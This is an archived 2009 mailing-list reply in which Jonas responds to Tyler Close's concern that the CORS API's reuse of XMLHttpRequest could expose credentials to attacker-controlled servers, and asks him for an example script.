Re: [cors] security issue with XMLHttpRequest API compatibility

On Mon, Apr 6, 2009 at 11:29 AM, Tyler Close <tyler.close@gmail.com> wrote:
> It looks like the client-side API for cross-origin messaging is the
> same as the current XMLHttpRequest API. I think there's a security
> issue with this decision. The current XMLHttpRequest implementation
> drops any attempted cross-origin request. This implementation protects
> a client-side application that inadvertently sends a request to an
> unexpected target URL. Since the request is dropped by the browser
> implementation, any client credentials (such as a password) in the
> request body are not exposed to the wrong server. Since XMLHttpRequest
> has, to date, provided this protection, client scripts have had no
> real need to vet the URLs that they send messages to. Consequently, it
> seems unlikely that these scripts do any vetting of their target URLs.
> It may be possible for an attacker to cause a client script in another
> domain to send a request to a target URL on the attacker's server.
> Since the attacker controls his server, the resource can be marked as
> accepting cross-domain requests. Since the client script wasn't
> expecting such requests to succeed, it may include client credentials
> in the sent request.

How would the script include client credentials in the request? Can
you show some an example of the type of script you are concerned
about?

/ Jonas

Received on Monday, 6 April 2009 20:55:46 UTC